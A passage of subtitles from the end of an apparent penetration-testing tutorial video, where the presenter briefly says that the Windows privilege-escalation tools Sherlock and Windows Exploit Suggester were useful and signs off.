372 00:28:04,130 --> 00:28:07,510 But we're not going to use Watson today.
373 00:28:07,680 --> 00:28:09,960 The Sherlock was, was plenty good.
374 00:28:09,980 --> 00:28:15,300 And also this Windows Exploit Suggester was actually pretty good as well.
375 00:28:15,350 --> 00:28:18,320 So a couple of new tools that we learned along the way.
376 00:28:19,100 --> 00:28:24,980 So until next time, I really do hope you learned something out of this video and I hope to see you in the
377 00:28:24,980 --> 00:28:26,480 next episode.
378 00:28:26,480 --> 00:28:28,940 Thank you very much and I will see you in the next video.